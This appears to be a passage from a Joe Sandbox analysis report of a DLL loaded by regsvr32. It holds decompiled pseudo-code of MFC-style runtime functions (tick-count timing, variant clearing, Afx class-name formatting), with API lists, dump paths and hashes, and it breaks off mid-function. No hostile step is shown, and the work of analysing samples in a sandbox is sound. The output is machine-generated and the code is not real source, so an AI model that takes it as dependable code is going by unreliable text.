                                                                                                                			E1003BB79(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				long _t4;
                                                                                                                				long _t5;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t9;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					__eflags =  *0x100bdee8;
                                                                                                                					if( *0x100bdee8 == 0) {
                                                                                                                						_t5 = GetTickCount();
                                                                                                                						 *0x100bdee8 =  *0x100bdee8 + 1;
                                                                                                                						__eflags =  *0x100bdee8;
                                                                                                                						 *0x100b9a80 = _t5;
                                                                                                                					}
                                                                                                                					_t4 = GetTickCount() -  *0x100b9a80;
                                                                                                                					__eflags = _t4 - 0xea60;
                                                                                                                					if(_t4 > 0xea60) {
                                                                                                                						__imp__CoFreeUnusedLibraries();
                                                                                                                						_t4 = GetTickCount();
                                                                                                                						 *0x100b9a80 = _t4;
                                                                                                                					}
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return E1003BB22(_t7, _t8, _t9, _t13, _t14, _a8);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BB9B
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BBA8
                                                                                                                • CoFreeUnusedLibraries.OLE32 ref: 1003BBB7
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BBBD
                                                                                                                  • Part of subcall function 1003BB22: CoFreeUnusedLibraries.OLE32 ref: 1003BB66
                                                                                                                  • Part of subcall function 1003BB22: OleUninitialize.OLE32 ref: 1003BB6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 685759847-0
                                                                                                                • Opcode ID: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
                                                                                                                • Instruction ID: 8eba64989bf9d3bfc4ba9ed942be2444cb3907f9553e26a8a35902e1a4101070
                                                                                                                • Opcode Fuzzy Hash: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
                                                                                                                • Instruction Fuzzy Hash: 28E0ED358145358FE351FB64CCC4689BBE4FB8631AF104A67E1529A468CBB05881DA92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003068C(intOrPtr* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr* _t104;
                                                                                                                				signed int _t106;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr* _t122;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t146;
                                                                                                                				void* _t149;
                                                                                                                				signed int _t150;
                                                                                                                				signed int _t174;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t177;
                                                                                                                				void* _t182;
                                                                                                                				signed int _t184;
                                                                                                                				void* _t185;
                                                                                                                				void* _t187;
                                                                                                                
                                                                                                                				_t186 = __ecx;
                                                                                                                				_t146 = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                                					__eflags =  *(__ecx + 0x40);
                                                                                                                					if( *(__ecx + 0x40) == 0) {
                                                                                                                						L9:
                                                                                                                						_t149 = 0;
                                                                                                                						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                                                                                						 *(_t186 + 0x38) = _t146;
                                                                                                                						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                                                                                							L12:
                                                                                                                							_t103 =  *(_t186 + 0x38);
                                                                                                                							__eflags = _t103 - _t146;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								_t176 = 0x30;
                                                                                                                								_t172 = _t103 * _t176 >> 0x20;
                                                                                                                								_t167 =  ~(__eflags > 0) | _t103 * _t176;
                                                                                                                								 *((intOrPtr*)(_t186 + 0x3c)) = E10009F14( ~(__eflags > 0) | _t103 * _t176, _t167);
                                                                                                                							}
                                                                                                                							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                                                                                							_v12 = _t146;
                                                                                                                							_v16 = _t146;
                                                                                                                							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                                                                                								L21:
                                                                                                                								_t150 =  *(_t186 + 0x38);
                                                                                                                								_t104 =  *((intOrPtr*)(_t186 + 8));
                                                                                                                								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
                                                                                                                								_t106 =  *(_t186 + 0x38);
                                                                                                                								__eflags = _t106 - _t146;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t174 = 0x10;
                                                                                                                									_t156 =  ~(__eflags > 0) | _t106 * _t174;
                                                                                                                									 *(_t186 + 0x40) = E10009F14( ~(__eflags > 0) | _t106 * _t174, _t156);
                                                                                                                								}
                                                                                                                								__eflags =  *(_t186 + 0x38) - _t146;
                                                                                                                								if( *(_t186 + 0x38) <= _t146) {
                                                                                                                									L26:
                                                                                                                									E1002FDB9(_t186);
                                                                                                                									return  *((intOrPtr*)( *_t186 + 0x10))();
                                                                                                                								} else {
                                                                                                                									_t182 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									do {
                                                                                                                										E10049170(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
                                                                                                                										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
                                                                                                                										_t187 = _t187 + 0xc;
                                                                                                                										_t146 = _t146 + 1;
                                                                                                                										_t182 = _t182 + 0x10;
                                                                                                                										__eflags = _t146 -  *(_t186 + 0x38);
                                                                                                                									} while (_t146 <  *(_t186 + 0x38));
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_v8 = _t146;
                                                                                                                								do {
                                                                                                                									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
                                                                                                                									__eflags = _t118 - _t146;
                                                                                                                									_v20 = _t118;
                                                                                                                									if(_t118 == _t146) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									_t184 = _v12 * 0x30;
                                                                                                                									__eflags = _t184;
                                                                                                                									do {
                                                                                                                										_t122 = E10012115( &_v20);
                                                                                                                										E1002D337(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
                                                                                                                										_v12 = _v12 + 1;
                                                                                                                										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
                                                                                                                										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
                                                                                                                										_t184 = _t184 + 0x30;
                                                                                                                										__eflags = _v20;
                                                                                                                									} while (_v20 != 0);
                                                                                                                									_t146 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									L20:
                                                                                                                									_v16 = _v16 + 1;
                                                                                                                									_v8 = _v8 + 0x28;
                                                                                                                									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
                                                                                                                								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
                                                                                                                								goto L21;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
                                                                                                                						__eflags = _t138;
                                                                                                                						do {
                                                                                                                							_t177 =  *_t138;
                                                                                                                							_t172 =  *(_t177 + 0xc);
                                                                                                                							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
                                                                                                                							_t149 = _t149 + 1;
                                                                                                                							_t138 = _t138 + 0x28;
                                                                                                                							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
                                                                                                                						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t185 = 0;
                                                                                                                					__eflags =  *(__ecx + 0x38);
                                                                                                                					if( *(__ecx + 0x38) <= 0) {
                                                                                                                						L8:
                                                                                                                						 *(_t186 + 0x40) = _t146;
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_v12 = 0;
                                                                                                                					do {
                                                                                                                						__imp__#9( *(__ecx + 0x40) + _v12);
                                                                                                                						_v12 = _v12 + 0x10;
                                                                                                                						_t185 = _t185 + 1;
                                                                                                                						__eflags = _t185 -  *(__ecx + 0x38);
                                                                                                                					} while (_t185 <  *(__ecx + 0x38));
                                                                                                                					__eflags =  *(__ecx + 0x38);
                                                                                                                					if(__eflags > 0) {
                                                                                                                						_push( *(__ecx + 0x40));
                                                                                                                						E10009F3F(0, _t185, __ecx, __eflags);
                                                                                                                						_push( *((intOrPtr*)(_t186 + 0x3c)));
                                                                                                                						E10009F3F(0, _t185, _t186, __eflags);
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				E1002FDB9(__ecx);
                                                                                                                				return  *((intOrPtr*)( *__ecx + 0x10))();
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1473721057-3887548279
                                                                                                                • Opcode ID: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
                                                                                                                • Instruction ID: 497c310cc3923061e9ddd0617e68816462549549d5104481a026dd38a865dc70
                                                                                                                • Opcode Fuzzy Hash: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
                                                                                                                • Instruction Fuzzy Hash: 89519875A00B01DFDB64CF68C98296AB7F1FF48314B604A6DE5828BA92C770F881CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1002E109(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _v4;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				void* _v28;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				char _v60;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				intOrPtr _v80;
                                                                                                                				short _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				short _v96;
                                                                                                                				short _v100;
                                                                                                                				signed int _v104;
                                                                                                                				intOrPtr _v108;
                                                                                                                				intOrPtr _v112;
                                                                                                                				signed int _v116;
                                                                                                                				intOrPtr _v120;
                                                                                                                				char _v124;
                                                                                                                				signed int* _t79;
                                                                                                                				void* _t90;
                                                                                                                				intOrPtr _t97;
                                                                                                                				intOrPtr* _t114;
                                                                                                                				intOrPtr* _t116;
                                                                                                                				intOrPtr* _t118;
                                                                                                                				signed int _t120;
                                                                                                                				signed int _t128;
                                                                                                                				signed int _t131;
                                                                                                                				intOrPtr _t132;
                                                                                                                				void* _t155;
                                                                                                                
                                                                                                                				_t153 = __edi;
                                                                                                                				_push(0x70);
                                                                                                                				E1004764D(0x100902ef, __ebx, __edi, __esi);
                                                                                                                				_t155 = __ecx;
                                                                                                                				_t79 =  *(__ecx + 0x50);
                                                                                                                				_t128 = 0;
                                                                                                                				_t131 = 0 | _t79 != 0x00000000;
                                                                                                                				if(_t131 != 0) {
                                                                                                                					_push( &_v16);
                                                                                                                					_push(0x100a5eec);
                                                                                                                					_v16 = 0;
                                                                                                                					_t131 =  *_t79;
                                                                                                                					_push(_t79);
                                                                                                                					_v20 = 0;
                                                                                                                					if( *_t131() < 0) {
                                                                                                                						L19:
                                                                                                                						return E10047725(_v20);
                                                                                                                					} else {
                                                                                                                						if((0 | _v16 != 0x00000000) == 0) {
                                                                                                                							goto L4;
                                                                                                                						} else {
                                                                                                                							_v120 = __ecx + 0xc8;
                                                                                                                							_v112 = __ecx + 0xd8;
                                                                                                                							_v108 = __ecx + 0xdc;
                                                                                                                							_v124 = 0x40;
                                                                                                                							_v116 = 0;
                                                                                                                							_v88 = 0;
                                                                                                                							_v76 = 0;
                                                                                                                							_v72 = 0;
                                                                                                                							E100235FF( &_v36);
                                                                                                                							_t97 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                							_v4 = 0;
                                                                                                                							if(_t97 == 0) {
                                                                                                                								goto L4;
                                                                                                                							} else {
                                                                                                                								_t153 =  *((intOrPtr*)(_t97 + 0x20));
                                                                                                                								_v104 = 0;
                                                                                                                								if(_t153 == 0) {
                                                                                                                									goto L4;
                                                                                                                								} else {
                                                                                                                									do {
                                                                                                                										_t31 = _t128 + 0x1009df98; // 0xfffffd3b
                                                                                                                										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
                                                                                                                										if(_v28 != 0) {
                                                                                                                											_t34 = _t128 + 0x1009df9c; // 0x4
                                                                                                                											_v104 = _v104 |  *_t34;
                                                                                                                										}
                                                                                                                										_t128 = _t128 + 8;
                                                                                                                									} while (_t128 < 0x40);
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
                                                                                                                									_v100 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
                                                                                                                									_v96 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
                                                                                                                									_v84 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
                                                                                                                									_v80 = _v28;
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
                                                                                                                									_t114 = _v28;
                                                                                                                									_push( &_v92);
                                                                                                                									_push(0x100a601c);
                                                                                                                									_push(_t114);
                                                                                                                									if( *((intOrPtr*)( *_t114))() < 0) {
                                                                                                                										_v92 = _v92 & 0x00000000;
                                                                                                                									}
                                                                                                                									_t116 = _v16;
                                                                                                                									_push( &_v60);
                                                                                                                									_push( &_v124);
                                                                                                                									_v60 = 0x18;
                                                                                                                									_push(_t116);
                                                                                                                									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
                                                                                                                										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
                                                                                                                										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
                                                                                                                										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
                                                                                                                										_v20 = 1;
                                                                                                                									}
                                                                                                                									_t118 = _v16;
                                                                                                                									 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                									_t120 = _v92;
                                                                                                                									if(_t120 != 0) {
                                                                                                                										 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                                                                                									}
                                                                                                                									__imp__#9( &_v36);
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					_push(_t131);
                                                                                                                					_v24 = 0x100b8618;
                                                                                                                					L10048E48( &_v24, 0x100aff30);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1004764D(0x1008dd26, _t128, _t153, _t155);
                                                                                                                					_t132 = E10020454(0x104);
                                                                                                                					_v36 = _t132;
                                                                                                                					_t90 = 0;
                                                                                                                					_v24 = 0;
                                                                                                                					if(_t132 != 0) {
                                                                                                                						_t90 = E1001DB72(_t132);
                                                                                                                					}
                                                                                                                					return E10047725(_t90);
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x1002e29d
                                                                                                                0x1002e2a0
                                                                                                                0x1002e2a5
                                                                                                                0x1002e2aa
                                                                                                                0x1002e2aa
                                                                                                                0x1002e2b1
                                                                                                                0x00000000
                                                                                                                0x1002e2b1
                                                                                                                0x1002e19d
                                                                                                                0x1002e193
                                                                                                                0x1002e152
                                                                                                                0x1002e127
                                                                                                                0x1002e127
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: @
                                                                                                                • API String ID: 431132790-2766056989
                                                                                                                • Opcode ID: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
                                                                                                                • Instruction ID: 27d6e068b945a38a4e3262720f663981c887c24b1d40a3015d78c7ca2024549e
                                                                                                                • Opcode Fuzzy Hash: e4fe646538f7a1e1a6620cc9ee88ccb0437611cecabb20d81ca85b59a8d3e10e
                                                                                                                • Instruction Fuzzy Hash: 3651C470E0025A9FDB04CFA8C888AEEB7F9FF48304B60456AE516EB251E775AD45CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10017046(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				char _v48;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				intOrPtr* _t37;
                                                                                                                				intOrPtr* _t38;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t56;
                                                                                                                				intOrPtr _t57;
                                                                                                                				void* _t61;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t76 = __eflags;
                                                                                                                				E10021FD9(1);
                                                                                                                				L10048E48(0, 0);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t56);
                                                                                                                				_push(_t64);
                                                                                                                				_push(_t61);
                                                                                                                				_t66 = E1001DD4F(_t56, _t61, _t64, _t76) + 0x7c;
                                                                                                                				_t57 =  *((intOrPtr*)(E1001E302(_t56, _t61, _t66, _t76) + 8));
                                                                                                                				if(_a8 != 0 || _a12 != 0) {
                                                                                                                					L5:
                                                                                                                					_v8 =  *((intOrPtr*)(E10049097(__eflags)));
                                                                                                                					_t35 = E10049097(__eflags);
                                                                                                                					_push(_a16);
                                                                                                                					 *_t35 = 0;
                                                                                                                					_push(_a12);
                                                                                                                					_push(_a8);
                                                                                                                					_push(_a4);
                                                                                                                					E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t57);
                                                                                                                				} else {
                                                                                                                					_t79 = _a16;
                                                                                                                					if(_a16 != 0) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_v8 =  *((intOrPtr*)(E10049097(_t79)));
                                                                                                                						_t54 = E10049097(_t79);
                                                                                                                						_push(_a4);
                                                                                                                						 *_t54 = 0;
                                                                                                                						E1004C1D3(_t66, 0x60, 0x5f, "Afx:%p:%x", _t57);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t37 = E10049097(_t79);
                                                                                                                				_t80 =  *_t37;
                                                                                                                				if( *_t37 == 0) {
                                                                                                                					_t38 = E10049097(__eflags);
                                                                                                                					_t60 = _v8;
                                                                                                                					 *_t38 = _v8;
                                                                                                                				} else {
                                                                                                                					E1000AD19( *((intOrPtr*)(E10049097(_t80))));
                                                                                                                					_pop(_t60);
                                                                                                                				}
                                                                                                                				_push( &_v48);
                                                                                                                				_push(_t66);
                                                                                                                				_push(_t57);
                                                                                                                				_t40 = E1001242B(_t57, _t60, 0, _t66, _t80);
                                                                                                                				_t81 = _t40;
                                                                                                                				if(_t40 == 0) {
                                                                                                                					_v48 = _a4;
                                                                                                                					_v44 = DefWindowProcA;
                                                                                                                					_v28 = _a16;
                                                                                                                					_v24 = _a8;
                                                                                                                					_v20 = _a12;
                                                                                                                					_push( &_v48);
                                                                                                                					_v36 = 0;
                                                                                                                					_v40 = 0;
                                                                                                                					_v32 = _t57;
                                                                                                                					_v16 = 0;
                                                                                                                					_v12 = _t66;
                                                                                                                					if(L10016FC9(_t57, _t60, 0, _t66, _t81) == 0) {
                                                                                                                						E1000C2E1(_t60);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t66;
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                  • Part of subcall function 10021FD9: LeaveCriticalSection.KERNEL32(?,10020559,00000010,00000010,00000008,1001E330,1001E2A6,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001,?,1000CECE,00000000), ref: 10021FF0
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10017051
                                                                                                                  • Part of subcall function 10048E48: RaiseException.KERNEL32(00000001,?,?,00000058,00000001,?,1000CECE,00000000,?,00000058,10006BB6), ref: 10048E88
                                                                                                                • __snprintf_s.LIBCMT ref: 100170A2
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • __snprintf_s.LIBCMT ref: 100170D4
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$CriticalExceptionException@8LeaveRaiseSectionThrow__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x
                                                                                                                • API String ID: 3966753335-3201128726
                                                                                                                • Opcode ID: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
                                                                                                                • Instruction ID: 1dbae72e943724650c3f85dc51fc8ef03dc1c7148edf81a1682273a05273279e
                                                                                                                • Opcode Fuzzy Hash: a2364757c673005b9556abfa695244951a75b134b50bb4799cc6880a16461c15
                                                                                                                • Instruction Fuzzy Hash: 64212EB5900309EFDB11DFA9D841A9EBBF4FF49290F114026F908AB252D770E9818BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10041624(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t38;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr _t43;
                                                                                                                				signed short* _t47;
                                                                                                                				void* _t52;
                                                                                                                				intOrPtr* _t56;
                                                                                                                				void* _t57;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t60 = __eflags;
                                                                                                                				_push(0x10);
                                                                                                                				E10047680(0x100915ca, __ebx, __edi, __esi);
                                                                                                                				_t56 =  *((intOrPtr*)(_t57 + 8)) + 0xffffffd0;
                                                                                                                				E1001E397(_t57 - 0x1c, _t60,  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) - 0x14)));
                                                                                                                				_t47 =  *(_t57 + 0xc);
                                                                                                                				 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
                                                                                                                				_t52 = E1004104F(_t56, _t47, 1);
                                                                                                                				if(_t52 != 0) {
                                                                                                                					E10049170(_t52,  *((intOrPtr*)(_t57 + 0x10)), 0, 0xc);
                                                                                                                					_t12 = _t52 + 0x14; // 0x14
                                                                                                                					_t36 = _t12;
                                                                                                                					__eflags =  *_t12;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						 *((intOrPtr*)(_t57 + 8)) = 0x80040064;
                                                                                                                						 *(_t57 - 4) = 1;
                                                                                                                						_t38 =  *((intOrPtr*)( *_t56 + 0x58))(_t47,  *((intOrPtr*)(_t57 + 0x10)));
                                                                                                                						__eflags = _t38;
                                                                                                                						if(_t38 != 0) {
                                                                                                                							 *((intOrPtr*)(_t57 + 8)) = 0;
                                                                                                                						}
                                                                                                                						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
